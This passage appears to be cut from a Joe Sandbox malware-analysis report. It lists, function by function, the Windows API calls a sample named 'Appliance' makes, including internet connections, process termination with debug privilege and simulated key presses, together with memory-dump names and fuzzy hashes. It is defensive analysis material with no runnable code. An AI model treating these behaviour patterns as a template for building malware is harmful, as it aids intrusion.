                                                                                                                                            • GetClientRect.USER32(?,?), ref: 00DC773A
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DC775B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1296646539-0
                                                                                                                                            • Opcode ID: 43102c84d5d06e5a780d2046b783771fd9220b3c56cbe1f37fc3c34d0821fd1d
                                                                                                                                            • Instruction ID: 576ece4ffc757fc9457290f009d31ee222eb5442789c292abd450dd87a14a88a
                                                                                                                                            • Opcode Fuzzy Hash: 43102c84d5d06e5a780d2046b783771fd9220b3c56cbe1f37fc3c34d0821fd1d
                                                                                                                                            • Instruction Fuzzy Hash: 2DC16B3990464AEFDB10CFA9C940BEDB7F1FF18314F14941AE899A7250D734A991DF60
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1282221369-0
                                                                                                                                            • Opcode ID: 5f456bd323c3f34d6d95490c89684c8434bbcfabcfef979e7dd14a4d2073ae85
                                                                                                                                            • Instruction ID: 1fd94de4257ec8f774f148e16e41fa044586468ec28dc23659da8c33e9d67e67
                                                                                                                                            • Opcode Fuzzy Hash: 5f456bd323c3f34d6d95490c89684c8434bbcfabcfef979e7dd14a4d2073ae85
                                                                                                                                            • Instruction Fuzzy Hash: 1A61F97190430DAFDB21AF75D8816BE7BD7DF01324B0A81AEEB44A7285D632994087B5
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00E55C24
                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00E55C65
                                                                                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 00E55C6B
                                                                                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00E55C6F
                                                                                                                                              • Part of subcall function 00E579F2: DeleteObject.GDI32(00000000), ref: 00E57A1E
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E55CAB
                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E55CB8
                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00E55CEB
                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00E55D25
                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00E55D34
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3210457359-0
                                                                                                                                            • Opcode ID: 974be4914bd650ce34fc3cdeb3c75e497938da7e4369b117e46db472638810bf
                                                                                                                                            • Instruction ID: 3be4826e2944ff22898e5294353a06020b646d74f3d7e69392cf91a232592e10
                                                                                                                                            • Opcode Fuzzy Hash: 974be4914bd650ce34fc3cdeb3c75e497938da7e4369b117e46db472638810bf
                                                                                                                                            • Instruction Fuzzy Hash: 2051EF32A40B09BFEF249B24CC59FD97BA1EF05316F146806FE14BA1E0C771A988CB51
                                                                                                                                            APIs
                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E3CBC7
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E3CBDA
                                                                                                                                            • SetEvent.KERNEL32(?), ref: 00E3CBEE
                                                                                                                                              • Part of subcall function 00E3CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E3CCB7
                                                                                                                                              • Part of subcall function 00E3CC98: GetLastError.KERNEL32 ref: 00E3CD67
                                                                                                                                              • Part of subcall function 00E3CC98: SetEvent.KERNEL32(?), ref: 00E3CD7B
                                                                                                                                              • Part of subcall function 00E3CC98: InternetCloseHandle.WININET(00000000), ref: 00E3CD86
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 337547030-0
                                                                                                                                            • Opcode ID: 2e3bec75c83a7c83cef366a431f5fdebadea223daac330888d1703c3414528f9
                                                                                                                                            • Instruction ID: 49f4daf29f34dcc4f263639991b1f671a84c00d7654ad51faf46a92f4306a11b
                                                                                                                                            • Opcode Fuzzy Hash: 2e3bec75c83a7c83cef366a431f5fdebadea223daac330888d1703c3414528f9
                                                                                                                                            • Instruction Fuzzy Hash: 5D315C71504705AFDB259F61CD48AB6BFE8FF08305F24691DF95AB2620D731E814EB60
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E24393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E243AD
                                                                                                                                              • Part of subcall function 00E24393: GetCurrentThreadId.KERNEL32 ref: 00E243B4
                                                                                                                                              • Part of subcall function 00E24393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E22F00), ref: 00E243BB
                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E22F0A
                                                                                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E22F28
                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E22F2C
                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E22F36
                                                                                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E22F4E
                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E22F52
                                                                                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E22F5C
                                                                                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E22F70
                                                                                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E22F74
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2014098862-0
                                                                                                                                            • Opcode ID: cd65677b186b23f0b60ab897345bf73ad0f4cbc35a4b21158bb6089040cd4d98
                                                                                                                                            • Instruction ID: 7f32f1f47f154cd332a686dbceb7840332223bef300a2f67aa4b625ae2f9faa1
                                                                                                                                            • Opcode Fuzzy Hash: cd65677b186b23f0b60ab897345bf73ad0f4cbc35a4b21158bb6089040cd4d98
                                                                                                                                            • Instruction Fuzzy Hash: A101D8707887207FFB2067699C8AF593F99EB4DB12F100415F318BF1E0C9E15444CAA9
                                                                                                                                            APIs
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E21D95,?,?,00000000), ref: 00E22159
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00E21D95,?,?,00000000), ref: 00E22160
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E21D95,?,?,00000000), ref: 00E22175
                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00E21D95,?,?,00000000), ref: 00E2217D
                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00E21D95,?,?,00000000), ref: 00E22180
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E21D95,?,?,00000000), ref: 00E22190
                                                                                                                                            • GetCurrentProcess.KERNEL32(00E21D95,00000000,?,00E21D95,?,?,00000000), ref: 00E22198
                                                                                                                                            • DuplicateHandle.KERNEL32(00000000,?,00E21D95,?,?,00000000), ref: 00E2219B
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00E221C1,00000000,00000000,00000000), ref: 00E221B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1957940570-0
                                                                                                                                            • Opcode ID: bce2f000b77e166966f3c3d7d0528f2a89e0cd4b9cd8c2488a9f3ea411d55d2b
                                                                                                                                            • Instruction ID: d6f7aecd54f814f86e4d2aa8ee8197201422e0c30cb2e4ffe59bde544ad0f3d6
                                                                                                                                            • Opcode Fuzzy Hash: bce2f000b77e166966f3c3d7d0528f2a89e0cd4b9cd8c2488a9f3ea411d55d2b
                                                                                                                                            • Instruction Fuzzy Hash: 7101BBB5245704BFEB20AFA6DD4DF6B7BACEB88711F004811FA05EB1A1CA709804CB21
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC41EA: _wcslen.LIBCMT ref: 00DC41EF
                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E2CF99
                                                                                                                                            • _wcslen.LIBCMT ref: 00E2CFE0
                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E2D047
                                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00E2D075
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                            • String ID: ,*$0$<*
                                                                                                                                            • API String ID: 1227352736-815946194
                                                                                                                                            • Opcode ID: c8ccc9e352d2dd91184ffd6c8beea583448f94bee26077a711abbb2c0cabb607
                                                                                                                                            • Instruction ID: eb4d20a989f71183f04287ddf0f1c8a4c731bea7416057f6c3330b45136a7fb5
                                                                                                                                            • Opcode Fuzzy Hash: c8ccc9e352d2dd91184ffd6c8beea583448f94bee26077a711abbb2c0cabb607
                                                                                                                                            • Instruction Fuzzy Hash: BA51C1716083209AD714AF24ED45BAF77E9EF45318F041A2DFA95E31E0DBA0C9458762
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00E2DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00E2DDAC
                                                                                                                                              • Part of subcall function 00E2DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00E2DDBA
                                                                                                                                              • Part of subcall function 00E2DD87: CloseHandle.KERNEL32(00000000), ref: 00E2DE87
                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4ABCA
                                                                                                                                            • GetLastError.KERNEL32 ref: 00E4ABDD
                                                                                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E4AC10
                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E4ACC5
                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00E4ACD0
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E4AD21
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                            • String ID: SeDebugPrivilege
                                                                                                                                            • API String ID: 2533919879-2896544425
                                                                                                                                            • Opcode ID: 8771149eed6a52b7571e1a4b5fe0cead5f7b4b1ed387fd08e7c47eac0c512267
                                                                                                                                            • Instruction ID: a0b2b14bac10ea050ffd664a19b80271dd35f8a866f27a622ff00da1c9b5eeb3
                                                                                                                                            • Opcode Fuzzy Hash: 8771149eed6a52b7571e1a4b5fe0cead5f7b4b1ed387fd08e7c47eac0c512267
                                                                                                                                            • Instruction Fuzzy Hash: 4E61AE702482429FD324DF15D484F25BBE1EF54318F1888ACE4669BBA3C771EC49CBA2
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00E543C1
                                                                                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00E543D6
                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00E543F0
                                                                                                                                            • _wcslen.LIBCMT ref: 00E54435
                                                                                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 00E54462
                                                                                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00E54490
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$Window_wcslen
                                                                                                                                            • String ID: SysListView32
                                                                                                                                            • API String ID: 2147712094-78025650
                                                                                                                                            • Opcode ID: ba6f017b8b0e20be029350a86f1c04f6557a851f58be8af2b89d05dfd48c2efc
                                                                                                                                            • Instruction ID: 80b13fcfaf6dec23402b796fae70b48ba1f43b5d648a0afde7e956baf9054bea
                                                                                                                                            • Opcode Fuzzy Hash: ba6f017b8b0e20be029350a86f1c04f6557a851f58be8af2b89d05dfd48c2efc
                                                                                                                                            • Instruction Fuzzy Hash: 2A41C371A00309ABDF219F64CC49BEA7BA9FF48359F101926F958F72D1D7709988CB90
                                                                                                                                            APIs
                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E2C6C4
                                                                                                                                            • IsMenu.USER32(00000000), ref: 00E2C6E4
                                                                                                                                            • CreatePopupMenu.USER32 ref: 00E2C71A
                                                                                                                                            • GetMenuItemCount.USER32(01976D60), ref: 00E2C76B
                                                                                                                                            • InsertMenuItemW.USER32(01976D60,?,00000001,00000030), ref: 00E2C793
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                            • String ID: 0$2
                                                                                                                                            • API String ID: 93392585-3793063076
                                                                                                                                            • Opcode ID: 806de168517aaab122ff8bc04d1c3c90507b99f4f4cb10d296ce982a2e3d0b6e
                                                                                                                                            • Instruction ID: 6aab090e90c224c20be942a035eb43da79806fb90fdc8e9129cd00a0aad87caf
                                                                                                                                            • Opcode Fuzzy Hash: 806de168517aaab122ff8bc04d1c3c90507b99f4f4cb10d296ce982a2e3d0b6e
                                                                                                                                            • Instruction Fuzzy Hash: 6651AE706002299BDF20CF78E884BAEBBF4AF48318F34561BE916B7291D7709945CF61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • BeginPaint.USER32(?,?,?), ref: 00DC1B35
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00DC1B99
                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DC1BB6
                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00DC1BC7
                                                                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00DC1C15
                                                                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00E03287
                                                                                                                                              • Part of subcall function 00DC1C2D: BeginPath.GDI32(00000000), ref: 00DC1C4B
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 3050599898-2063206799
                                                                                                                                            • Opcode ID: 0cb5d49c36142ef0f2f0b162d0d557a5a8bf9749abafa43e482b3d33cf1b6a10
                                                                                                                                            • Instruction ID: ac30c990b54db9217f887ba28299b70b3f228109d0203caba103478e1b27608e
                                                                                                                                            • Opcode Fuzzy Hash: 0cb5d49c36142ef0f2f0b162d0d557a5a8bf9749abafa43e482b3d33cf1b6a10
                                                                                                                                            • Instruction Fuzzy Hash: 4F41E234105312AFCB20DF25CC84FB67BA8EF46324F14066EFA94971B2C7309849DB62
                                                                                                                                            APIs
                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00E58740
                                                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00E58765
                                                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00E5877D
                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00E587A6
                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00E3C1F2,00000000), ref: 00E587C6
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00E587B1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Long$MetricsSystem
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 2294984445-2063206799
                                                                                                                                            • Opcode ID: 958f344adcacf2f900bc5a00aec6e9156870e79753b1ca53d44dbc3080308be9
                                                                                                                                            • Instruction ID: 446904c1de3bfaebcff4082a2fbf9b3a0bbd3dc36ebd7dfa88301685c4401588
                                                                                                                                            • Opcode Fuzzy Hash: 958f344adcacf2f900bc5a00aec6e9156870e79753b1ca53d44dbc3080308be9
                                                                                                                                            • Instruction Fuzzy Hash: AE2188716153519FCF285F39CD04A6A37A5EB48366F245E2AFD26F21E0EA308858CB10
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                            • API String ID: 642191829-3771769585
                                                                                                                                            • Opcode ID: 971e20fe09eb514d4eef6365e67613ffd2f33ae3fcd8c45ef81601fa01f8eb2e
                                                                                                                                            • Instruction ID: 7177d4adcc5fc1960ab8c437f8d0c043a5e04025c5cf08fcb3feb1a2a7c36e2f
                                                                                                                                            • Opcode Fuzzy Hash: 971e20fe09eb514d4eef6365e67613ffd2f33ae3fcd8c45ef81601fa01f8eb2e
                                                                                                                                            • Instruction Fuzzy Hash: 8111B431904235BFCB287B61EC4AEEE77ACEF05715F100066F555B6191EEB48A858A70
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
